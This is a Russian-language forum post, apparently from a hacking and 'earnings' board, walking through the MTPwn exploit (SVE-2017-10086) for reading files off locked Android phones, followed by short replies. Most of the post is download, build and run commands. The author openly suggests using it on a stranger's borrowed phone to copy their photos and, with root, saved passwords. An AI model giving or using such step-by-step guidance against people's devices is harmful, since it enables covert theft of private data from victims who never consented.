• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Взлом заблокированного телефона через MTP

zHd4

Местный
Сообщения
107
Реакции
82
0 руб.
Telegram
(Для конкурса)

Всем привет! Сегодня бы я хотел рассказать про эксплоит SVE-2017-10086.
Этот эксплоит позволяет получить доступ к файлам заблокированного
девайса.

MTP - аппаратно-независимый протокол, разработанный компанией Microsoft для подключения цифровых плееров к компьютеру.

Сам эксплоит заключается в этих строках:
Код:
folders = LIBMTP_Get_Folder_List(device);
files = LIBMTP_Get_Filelisting_With_Callback(device,NULL NULL);

Прошивка андроид разрешает запрос для доступа к файлам.
Исправить бы это можно бы было проверкой:
если девайс защишен экраном блокировки, блокировать все соединения по MTP.
Конечно, это очивидно, но все же.

В первую очередь, давайте определим его характеристики:

Работает на андроидах от 4.4.x до 7.x
Был исправлен 27/10/2017 (но на старых и не обновленных девайсах должен сработать).

Итак приступим.

1. В первую очередь нам нужен линукс (желательно kali, так как буду показывать на его примере).
Далее откроем терминал и скачаем наш эксплоит:

Код:
cd Desktop
git clone https://github.com/smeso/MTPwn.git

P. S. Можно скачать последнюю версию:
Код:
curl -L "https://github.com/smeso/MTPwn/archive/v0.1.tar.gz" -o mtpwn.tgz

2. Установить библиотеку LIBMTP коммандой:

Код:
apt-get install libmtp-dev
(eсли не kali, использовать sudo)

3. Компилируем наш эксплоит:

Код:
cd MTPwn
make

4. Подключаем наш заблокированный девайс по usb и запускаем эксплоит:

Код:
./mtpwn

Теперь о том, как это можно использовать:

Представим такую ситуацию, вы сидите в самолёте с ноутом, у вас просят зарядить телефон и вы
соглашайтесь быстренько запуская эксплоит и копируйте все фотографии, если есть рут, то и сохраненные пароли.
Можно много чего придумать.

ttt.png


Наслаждайтесь и пользуйтесь!
 
Последнее редактирование:

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Стоит изменить название статьи: Перевод и краткое пояснения инструкции с github.
От себя у тебя лишь последний абзац, но на статью он не тянет.
Cовет личный: Статья не должна состоять только из инструкции установки.
 

zHd4

Местный
Сообщения
107
Реакции
82
0 руб.
Telegram
Стоит изменить название статьи: Перевод и краткое пояснения инструкции с github.
От себя у тебя лишь последний абзац, но на статью он не тянет.
Cовет личный: Статья не должна состоять только из инструкции установки.
теперь достаточно
@Night @ims0rry
 
Последнее редактирование:

MOCKBA

Резидент
Сообщения
190
Реакции
192
0 руб.
Skype
Telegram
а толку Андроиды взламывать? Три клавиши зажал - рекавери - телефон обнулился.
 

MOCKBA

Резидент
Сообщения
190
Реакции
192
0 руб.
Skype
Telegram

zHd4

Местный
Сообщения
107
Реакции
82
0 руб.
Telegram
ну тогда в названии темы или в предисловии я не увидел цели взлома)
Тема так называется потому, что cдесь используется эксплоит для получения доступа к файлам на заблокированном девайсе, а не обход блокировки
 
Последнее редактирование:
Сверху Снизу